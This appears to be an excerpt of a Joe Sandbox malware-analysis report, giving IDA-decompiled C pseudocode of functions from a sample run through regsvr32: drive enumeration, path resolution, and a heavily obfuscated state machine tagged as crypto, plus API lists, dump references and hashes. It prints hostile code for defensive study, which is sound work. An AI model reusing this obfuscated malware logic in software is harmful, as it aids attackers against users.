                                                                                                                0x1000fdc2
                                                                                                                0x1000fdc7
                                                                                                                0x1000fdc9
                                                                                                                0x1000fdce
                                                                                                                0x1000fdce
                                                                                                                0x1000fdd4
                                                                                                                0x1000fdd8
                                                                                                                0x1000fde0
                                                                                                                0x1000fde0
                                                                                                                0x1000fde5
                                                                                                                0x1000fde9
                                                                                                                0x1000fdf4
                                                                                                                0x1000fdf4
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FACE
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FAE2
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000FB11
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSendTerminateThreadType
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3133380392-908802073
                                                                                                                • Opcode ID: a057d853a7b5793f4b274ae9c00bbc9e93f34406da7524c0c9249602c951c0fd
                                                                                                                • Instruction ID: e432feac7eec440a0e8b97ebd4871b2c47b6a50524a8cf6d2b9a3a90325b327f
                                                                                                                • Opcode Fuzzy Hash: a057d853a7b5793f4b274ae9c00bbc9e93f34406da7524c0c9249602c951c0fd
                                                                                                                • Instruction Fuzzy Hash: 2991BE752083819BE314DB60CD95FABB7E6EF84348F544A1DFA458B292DBB0F905CB12
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002084E Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1002084E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				signed int _t50;
				void* _t52;
				CHAR* _t56;
				signed int _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t1 = _t100 - 0x13c; // -120
				_t98 = _t1;
				_t38 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1003D1E6(E10053476, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E1001729E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t11 = _t98 - 0x14; // -140
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t11);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						_t52 = E100173A6();
						_t13 = _t98 - 0x10; // -136
						E10001050(_t13, _t90, _t52);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						_t16 = _t98 - 0x10; // -136
						E10020684(_t74, _t98, __eflags, _t92, _t16);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001020( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t18 = _t98 - 0x1c; // -148
							_t19 = _t98 - 0x20; // -152
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t19, _t18, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t31 =  &(_t98->cFileName); // -76
												_t65 = lstrlenA(_t31);
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t33 =  &(_t98->cFileName); // -76
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E100202D5(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97, _t33);
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10020823(_t90, _t92,  *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001020( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10017042(_t74, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10020823(_t90, _t92,  *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1003B437(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}























                                                                                                                0x1002084e
                                                                                                                0x1002084e
                                                                                                                0x1002084e
                                                                                                                0x10020855
                                                                                                                0x10020855
                                                                                                                0x10020859
                                                                                                                0x10020860
                                                                                                                0x10020866
                                                                                                                0x1002086d
                                                                                                                0x10020878
                                                                                                                0x1002087e
                                                                                                                0x10020884
                                                                                                                0x10020889
                                                                                                                0x1002088e
                                                                                                                0x10020890
                                                                                                                0x10020892
                                                                                                                0x10020892
                                                                                                                0x10020892
                                                                                                                0x100208a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100208a2
                                                                                                                0x100208ae
                                                                                                                0x100208b6
                                                                                                                0x100208d5
                                                                                                                0x100208d7
                                                                                                                0x00000000
                                                                                                                0x100208d9
                                                                                                                0x100208d9
                                                                                                                0x100208df
                                                                                                                0x100208e2
                                                                                                                0x100208e7
                                                                                                                0x100208eb
                                                                                                                0x100208f0
                                                                                                                0x100208f8
                                                                                                                0x100208fe
                                                                                                                0x10020900
                                                                                                                0x10020992
                                                                                                                0x10020998
                                                                                                                0x1002099f
                                                                                                                0x1002099f
                                                                                                                0x10020906
                                                                                                                0x10020908
                                                                                                                0x1002090c
                                                                                                                0x10020916
                                                                                                                0x1002091c
                                                                                                                0x1002091e
                                                                                                                0x10020936
                                                                                                                0x1002093a
                                                                                                                0x1002093d
                                                                                                                0x1002093d
                                                                                                                0x10020943
                                                                                                                0x10020947
                                                                                                                0x00000000
                                                                                                                0x10020949
                                                                                                                0x1002094e
                                                                                                                0x10020954
                                                                                                                0x10020957
                                                                                                                0x00000000
                                                                                                                0x10020959
                                                                                                                0x1002095a
                                                                                                                0x10020960
                                                                                                                0x10020964
                                                                                                                0x00000000
                                                                                                                0x10020966
                                                                                                                0x10020966
                                                                                                                0x10020969
                                                                                                                0x00000000
                                                                                                                0x1002096b
                                                                                                                0x1002096b
                                                                                                                0x1002096f
                                                                                                                0x10020978
                                                                                                                0x1002097c
                                                                                                                0x1002097e
                                                                                                                0x00000000
                                                                                                                0x10020980
                                                                                                                0x10020980
                                                                                                                0x10020984
                                                                                                                0x10020984
                                                                                                                0x1002098a
                                                                                                                0x00000000
                                                                                                                0x1002098f
                                                                                                                0x1002097e
                                                                                                                0x10020969
                                                                                                                0x10020964
                                                                                                                0x10020957
                                                                                                                0x10020920
                                                                                                                0x10020920
                                                                                                                0x10020924
                                                                                                                0x10020929
                                                                                                                0x1002092f
                                                                                                                0x00000000
                                                                                                                0x1002092f
                                                                                                                0x1002091e
                                                                                                                0x10020900
                                                                                                                0x100208b8
                                                                                                                0x100208bd
                                                                                                                0x100208c5
                                                                                                                0x100208c9
                                                                                                                0x100208ce
                                                                                                                0x100208ce
                                                                                                                0x100208ce
                                                                                                                0x100209a3
                                                                                                                0x100209ab
                                                                                                                0x100209ac
                                                                                                                0x100209ad
                                                                                                                0x100209c2

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002086D
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,-0000008C,00000014,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 100208AE
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • PathIsUNCA.SHLWAPI(?), ref: 100208F8
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 10020916
                                                                                                                • CharUpperA.USER32 ref: 1002093D
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002094E
                                                                                                                • FindClose.KERNEL32(00000000,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002095A
                                                                                                                • lstrlenA.KERNEL32(-0000004C,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002096F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4099955704-0
                                                                                                                • Opcode ID: 8608b49f40986e44812c40144a83824b224115d6aa1f6d9be985fb01b9d35b3d
                                                                                                                • Instruction ID: 764d7a462618b0f06848026864ba4b2df67a22439e302d94f0936d83bf202709
                                                                                                                • Opcode Fuzzy Hash: 8608b49f40986e44812c40144a83824b224115d6aa1f6d9be985fb01b9d35b3d
                                                                                                                • Instruction Fuzzy Hash: 7941C371A0025AAFEB11DBB0DC85BFF77BEEF04354F404529F816E2292EB349D448A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BAF0B Relevance: 11.8, Strings: 9, Instructions: 577COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BAF0B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				void* _t605;
				intOrPtr _t650;
				void* _t651;
				void* _t655;
				void* _t657;
				void* _t665;
				void* _t667;
				void* _t672;
				void* _t677;
				intOrPtr _t682;
				void* _t728;
				void* _t744;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
				void* _t758;
				intOrPtr _t761;
				signed int* _t763;
				signed int* _t767;
				void* _t770;

				_t682 = __ecx;
				_push(0x20);
				_push(_a20);
				_v268 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t605);
				_v20 = 0xbfa34d;
				_t761 = 0;
				_v16 = 0xfce444;
				_t763 =  &(( &_v324)[8]);
				_v12 = 0x8a6c8a;
				_v8 = 0;
				_t677 = 0xce5d081;
				_v316 = 0x13f24f;
				_v316 = _v316 | 0xe1b32d13;
				_v316 = _v316 ^ 0x2f76fc63;
				_v316 = _v316 >> 6;
				_v316 = _v316 ^ 0x033b140c;
				_v76 = 0xd74768;
				_v76 = _v76 + 0x83a7;
				_v76 = _v76 ^ 0x00d7cb0f;
				_v144 = 0xc94ad1;
				_v144 = _v144 ^ 0x88868301;
				_v144 = _v144 ^ 0x884fc9d0;
				_v120 = 0x57cb78;
				_t746 = 0x1c;
				_v120 = _v120 / _t746;
				_v120 = _v120 ^ 0x000322b2;
				_v108 = 0xea57b7;
				_v108 = _v108 >> 9;
				_v108 = _v108 ^ 0x0000752b;
				_v116 = 0x8cb900;
				_t747 = 0x2c;
				_v116 = _v116 * 7;
				_v116 = _v116 ^ 0x03d90f00;
				_v52 = 0x617f71;
				_v52 = _v52 + 0xffff447f;
				_v52 = _v52 ^ 0x0060c3f0;
				_v132 = 0x16826f;
				_v132 = _v132 / _t747;
				_v132 = _v132 ^ 0x000082f6;
				_v164 = 0x7969b3;
				_v164 = _v164 ^ 0xa0ef9d20;
				_v164 = _v164 ^ 0xa096f493;
				_v180 = 0xd63d59;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 + 0xffffc5be;
				_v180 = _v180 ^ 0xffffc76a;
				_v44 = 0x3c2c33;
				_v44 = _v44 + 0xffffbe1e;
				_v44 = _v44 ^ 0x003bea51;
				_v252 = 0x8d3c7d;
				_v252 = _v252 | 0xc572c0eb;
				_t748 = 0x79;
				_v252 = _v252 / _t748;
				_v252 = _v252 ^ 0x01a2e8b3;
				_v148 = 0x7e9d70;
				_v148 = _v148 * 0x7e;
				_v148 = _v148 ^ 0x3e5aa374;
				_v272 = 0x7ab385;
				_t749 = 0x56;
				_v272 = _v272 * 0x16;
				_v272 = _v272 + 0xffff4a7c;
				_v272 = _v272 << 0xe;
				_v272 = _v272 ^ 0xadfea699;
				_v296 = 0x1e04b4;
				_v296 = _v296 | 0xe6b1dfc4;
				_v296 = _v296 + 0xffff6f85;
				_v296 = _v296 / _t749;
				_v296 = _v296 ^ 0x02a65527;
				_v264 = 0x88168e;
				_t750 = 0x4a;
				_v264 = _v264 * 0x7b;
				_v264 = _v264 >> 7;
				_v264 = _v264 >> 6;
				_v264 = _v264 ^ 0x000d8876;
				_v84 = 0xeb11ed;
				_v84 = _v84 + 0xffff790d;
				_v84 = _v84 ^ 0x00e8976b;
				_v288 = 0xc59d24;
				_v288 = _v288 << 0x10;
				_v288 = _v288 ^ 0xfccf2b86;
				_v288 = _v288 + 0xffff89e1;
				_v288 = _v288 ^ 0x61edcbb3;
				_v228 = 0xc63f4d;
				_v228 = _v228 + 0xffffd388;
				_v228 = _v228 + 0xfffffd3a;
				_v228 = _v228 ^ 0x00c8b1bc;
				_v204 = 0x5d4e11;
				_v204 = _v204 | 0x95f451bd;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x04ac2697;
				_v172 = 0x415b79;
				_v172 = _v172 + 0xffff3f51;
				_v172 = _v172 ^ 0x004a711a;
				_v324 = 0x1faf76;
				_v324 = _v324 / _t750;
				_v324 = _v324 + 0x6f96;
				_v324 = _v324 << 0x10;
				_v324 = _v324 ^ 0xdd38103c;
				_v48 = 0x3dd7d6;
				_v48 = _v48 | 0x3e8624f0;
				_v48 = _v48 ^ 0x3eb1b039;
				_v140 = 0x32e100;
				_v140 = _v140 * 0x27;
				_v140 = _v140 ^ 0x07c62d9d;
				_v56 = 0x14a539;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x052ec169;
				_v220 = 0x4e84cf;
				_v220 = _v220 + 0xbb56;
				_v220 = _v220 | 0x88fe6515;
				_v220 = _v220 ^ 0x88feb6c3;
				_v188 = 0x57e5d0;
				_v188 = _v188 + 0xffffe5f4;
				_v188 = _v188 + 0x51de;
				_v188 = _v188 ^ 0x00593e3e;
				_v124 = 0xda876f;
				_v124 = _v124 + 0x1f26;
				_v124 = _v124 ^ 0x00d6dd7c;
				_v244 = 0x227fef;
				_v244 = _v244 ^ 0x95219bbf;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ 0x0004fd1c;
				_v212 = 0x58955c;
				_v212 = _v212 >> 0xf;
				_v212 = _v212 | 0xf31a6d07;
				_v212 = _v212 ^ 0xf31d7d11;
				_v308 = 0xef0159;
				_v308 = _v308 + 0xffffa670;
				_v308 = _v308 ^ 0xf3f3a861;
				_v308 = _v308 | 0x4efb3e99;
				_v308 = _v308 ^ 0xfff432a6;
				_v196 = 0x60905e;
				_v196 = _v196 + 0x6bd4;
				_t751 = 0x48;
				_v196 = _v196 * 0x13;
				_v196 = _v196 ^ 0x0731c03a;
				_v152 = 0xfe5ccd;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0x01f6c1e2;
				_v160 = 0xa5d5e4;
				_v160 = _v160 + 0x16d5;
				_v160 = _v160 ^ 0x00a2f9b6;
				_v200 = 0x14d0d1;
				_v200 = _v200 ^ 0xd5fbe661;
				_v200 = _v200 ^ 0x5a7cfcf7;
				_v200 = _v200 ^ 0x8f998887;
				_v168 = 0x64e175;
				_v168 = _v168 + 0xffff6898;
				_v168 = _v168 ^ 0x006b4d34;
				_v128 = 0x96781a;
				_v128 = _v128 | 0x9f7be4dd;
				_v128 = _v128 ^ 0x9ff57e3a;
				_v136 = 0xd3003f;
				_v136 = _v136 / _t751;
				_v136 = _v136 ^ 0x00086659;
				_v284 = 0xa8c03d;
				_v284 = _v284 + 0x63a9;
				_v284 = _v284 + 0x9a8e;
				_v284 = _v284 + 0xffff3034;
				_v284 = _v284 ^ 0x00aeae44;
				_v192 = 0x725534;
				_v192 = _v192 >> 2;
				_v192 = _v192 | 0xf5d012a3;
				_v192 = _v192 ^ 0xf5d4cb4b;
				_v292 = 0xf873eb;
				_v292 = _v292 << 9;
				_v292 = _v292 | 0xf14de7fd;
				_v292 = _v292 ^ 0xf1e3b9de;
				_v96 = 0x553d1c;
				_v96 = _v96 + 0xd0f2;
				_v96 = _v96 ^ 0x00538e7c;
				_v104 = 0xe7a1df;
				_v104 = _v104 + 0xffff2622;
				_v104 = _v104 ^ 0x00e471b4;
				_v276 = 0x85d157;
				_v276 = _v276 ^ 0x77f80d5d;
				_t752 = 0x5a;
				_v276 = _v276 / _t752;
				_v276 = _v276 + 0x59de;
				_v276 = _v276 ^ 0x015a4f70;
				_v112 = 0xcc5f93;
				_t753 = 0x6b;
				_v112 = _v112 / _t753;
				_v112 = _v112 ^ 0x000186ab;
				_v72 = 0xf61229;
				_v72 = _v72 << 0xc;
				_v72 = _v72 ^ 0x61205fdf;
				_v80 = 0x8c2d30;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x00057b99;
				_v184 = 0x9464e1;
				_v184 = _v184 | 0x19a6b3d0;
				_v184 = _v184 << 2;
				_v184 = _v184 ^ 0x66d456ed;
				_v88 = 0x92a103;
				_v88 = _v88 | 0x23c05aae;
				_v88 = _v88 ^ 0x23df96d7;
				_v68 = 0xa07946;
				_t754 = 5;
				_v68 = _v68 / _t754;
				_v68 = _v68 ^ 0x002378d7;
				_v224 = 0x24e9af;
				_t755 = 9;
				_v224 = _v224 * 0x6f;
				_v224 = _v224 + 0xffffeeb9;
				_v224 = _v224 ^ 0x10070dbc;
				_v232 = 0x9d5ea3;
				_v232 = _v232 + 0xffffb05d;
				_v232 = _v232 << 8;
				_v232 = _v232 ^ 0x9d0fa184;
				_v300 = 0xa6177d;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 << 2;
				_v300 = _v300 + 0xfffff94d;
				_v300 = _v300 ^ 0x0000e226;
				_v240 = 0x7363f7;
				_v240 = _v240 + 0x1de2;
				_v240 = _v240 + 0x9216;
				_v240 = _v240 ^ 0x007c5529;
				_v280 = 0x8d6799;
				_v280 = _v280 | 0x967ed287;
				_v280 = _v280 * 0x7e;
				_v280 = _v280 / _t755;
				_v280 = _v280 ^ 0x091534b6;
				_v312 = 0xd87472;
				_v312 = _v312 | 0x97127034;
				_v312 = _v312 << 5;
				_v312 = _v312 | 0x0fb1eee4;
				_v312 = _v312 ^ 0xfff36608;
				_v176 = 0xc4edd1;
				_v176 = _v176 >> 6;
				_t756 = 0x2e;
				_v176 = _v176 * 0x16;
				_v176 = _v176 ^ 0x0045a18c;
				_v236 = 0xa889f9;
				_v236 = _v236 | 0xf5c1a96a;
				_v236 = _v236 ^ 0x03084e05;
				_v236 = _v236 ^ 0xf6e5b847;
				_v156 = 0x1f64cb;
				_v156 = _v156 + 0xffff6e2a;
				_v156 = _v156 ^ 0x00149b18;
				_v304 = 0xe03fce;
				_v304 = _v304 + 0x8ffa;
				_v304 = _v304 * 0x6a;
				_v304 = _v304 / _t756;
				_v304 = _v304 ^ 0x020711fd;
				_v92 = 0xd41708;
				_v92 = _v92 * 0x13;
				_v92 = _v92 ^ 0x0fb104ed;
				_v60 = 0xde188;
				_v60 = _v60 | 0xa7a9e015;
				_v60 = _v60 ^ 0xa7a876b9;
				_v208 = 0x4a0bde;
				_v208 = _v208 * 0x79;
				_v208 = _v208 * 0x28;
				_v208 = _v208 ^ 0x77fb7868;
				_v100 = 0x723f69;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 ^ 0x000cee5f;
				_t744 = 0x6db7fd8;
				_v216 = 0xd709df;
				_v216 = _v216 << 0xc;
				_v216 = _v216 | 0x02074724;
				_v216 = _v216 ^ 0x7290135f;
				_v256 = 0xe59e46;
				_v256 = _v256 >> 0xb;
				_v256 = _v256 + 0xffff652d;
				_t757 = 0x69;
				_t758 = 0x3791d1a;
				_v256 = _v256 / _t757;
				_v256 = _v256 ^ 0x02777912;
				_v320 = 0x3b8273;
				_v320 = _v320 * 0x72;
				_v320 = _v320 << 7;
				_v320 = _v320 + 0xc85f;
				_v320 = _v320 ^ 0x400a70c2;
				_v64 = 0xbe5655;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x0019b7c7;
				_v248 = 0xa173cd;
				_v248 = _v248 | 0x0b03dc08;
				_v248 = _v248 << 0xf;
				_v248 = _v248 ^ 0xffebb607;
				_v260 = 0x812e2f;
				_v260 = _v260 << 4;
				_v260 = _v260 | 0xf9ae6005;
				_v260 = _v260 << 8;
				_v260 = _v260 ^ 0xbee91bc8;
				while(1) {
					L1:
					while(1) {
						_t728 = 0xb24d068;
						do {
							while(1) {
								L3:
								_t770 = _t677 - _t744;
								if(_t770 <= 0) {
									break;
								}
								__eflags = _t677 - _t728;
								if(_t677 == _t728) {
									_push(_t682);
									_t650 = E001A303A(_t682, _v28);
									_t763 =  &(_t763[3]);
									_v32 = _t650;
									__eflags = _t650;
									if(__eflags == 0) {
										_t677 = _t744;
										goto L27;
									} else {
										_t677 = 0x2ddff79;
										goto L11;
									}
								} else {
									__eflags = _t677 - 0xce5d081;
									if(__eflags == 0) {
										_t677 = 0x3040d11;
										continue;
									} else {
										__eflags = _t677 - 0xcffed49;
										if(__eflags == 0) {
											_push(_v168);
											_push(0x1a14e4);
											_push(_v200);
											_t672 = E001AEB4B( &_v28, _v128, _v136, _v284, _v192, _v292,  &_v24, _v144, E001BF5D9(_v152, _v160, __eflags), _v36);
											_t767 =  &(_t763[0xc]);
											__eflags = _t672 - _v120;
											_t677 =  ==  ? 0xb24d068 : _t744;
											E001BF94B(_t670, _v96, _v104, _v276, _v112);
											L15:
											_t763 =  &(_t767[3]);
											_t758 = 0x3791d1a;
											L27:
											_t682 = _v268;
											_t651 = 0x583810f;
											_t728 = 0xb24d068;
											goto L28;
										} else {
											__eflags = _t677 - 0xd17ebbc;
											if(_t677 != 0xd17ebbc) {
												goto L28;
											} else {
												E001A4F68(_v60, _v40, _v208, _v100, _v216);
												_t763 =  &(_t763[3]);
												_t677 = 0x6a74054;
												L11:
												_t682 = _v268;
												goto L1;
											}
										}
									}
								}
								L31:
								return _t761;
							}
							if(_t770 == 0) {
								E001B2519(_v64, _v36, _v248, _v252, _v260);
							} else {
								if(_t677 == 0x2ddff79) {
									_push(_t682);
									_t655 = E001A500A(_v28, _v108, _v36, _v68,  &_v40, _v224, _v116, _v232, _v300, _v32, _v240);
									_t763 =  &(_t763[0xa]);
									__eflags = _t655 - _v52;
									_t682 = _v268;
									_t651 = 0x583810f;
									_t677 =  ==  ? 0x583810f : 0x6a74054;
									_t728 = 0xb24d068;
									goto L3;
								} else {
									if(_t677 == 0x3040d11) {
										_push(_v264);
										_push(0x1a1574);
										_push(_v296);
										_t657 = E001BF5D9(_v148, _v272, __eflags);
										_push(_v204);
										_push(0x1a1504);
										_push(_v228);
										__eflags = E001AD2C9(_t657, _v316, _v172, _v324,  &_v36, _v48, _v140, E001BF5D9(_v84, _v288, __eflags)) - _v76;
										_t677 =  ==  ? 0xcffed49 : 0x5cb3ec9;
										E001BF94B(_t657, _v56, _v220, _v188, _v124);
										_t767 =  &(_t763[0xf]);
										E001BF94B(_t658, _v244, _v212, _v308, _v196);
										_t744 = 0x6db7fd8;
										goto L15;
									} else {
										if(_t677 == _t758) {
											_t665 = E001BCEFF(_v236, _v156, 0x20, _v40, _t682, _v180, _v304, _v92);
											_t763 =  &(_t763[6]);
											_t677 = 0xd17ebbc;
											__eflags = _t665 - _v44;
											_t761 =  ==  ? 1 : _t761;
											goto L11;
										} else {
											if(_t677 == _t651) {
												_t667 = E001BFE12(_v280, _v132, _v40, _v312, _a12, _v176, _a16);
												_t763 =  &(_t763[5]);
												__eflags = _t667 - _v164;
												_t677 =  ==  ? _t758 : 0xd17ebbc;
												goto L11;
											} else {
												if(_t677 != 0x6a74054) {
													goto L28;
												} else {
													E001B17D2(_v256, _v320, _v32);
													_t677 = _t744;
													goto L11;
												}
											}
										}
									}
								}
							}
							goto L31;
							L28:
							__eflags = _t677 - 0x5cb3ec9;
						} while (__eflags != 0);
						goto L31;
					}
				}
			}
















































































































                                                                                                                0x001baf0b
                                                                                                                0x001baf15
                                                                                                                0x001baf17
                                                                                                                0x001baf1e
                                                                                                                0x001baf22
                                                                                                                0x001baf29
                                                                                                                0x001baf30
                                                                                                                0x001baf37
                                                                                                                0x001baf3e
                                                                                                                0x001baf3f
                                                                                                                0x001baf40
                                                                                                                0x001baf45
                                                                                                                0x001baf50
                                                                                                                0x001baf52
                                                                                                                0x001baf5d
                                                                                                                0x001baf60
                                                                                                                0x001baf6d
                                                                                                                0x001baf74
                                                                                                                0x001baf79
                                                                                                                0x001baf81
                                                                                                                0x001baf89
                                                                                                                0x001baf91
                                                                                                                0x001baf96
                                                                                                                0x001baf9e
                                                                                                                0x001bafa9
                                                                                                                0x001bafb4
                                                                                                                0x001bafbf
                                                                                                                0x001bafca
                                                                                                                0x001bafd5
                                                                                                                0x001bafe0
                                                                                                                0x001baff4
                                                                                                                0x001baff9
                                                                                                                0x001bb002
                                                                                                                0x001bb00d
                                                                                                                0x001bb018
                                                                                                                0x001bb020
                                                                                                                0x001bb02b
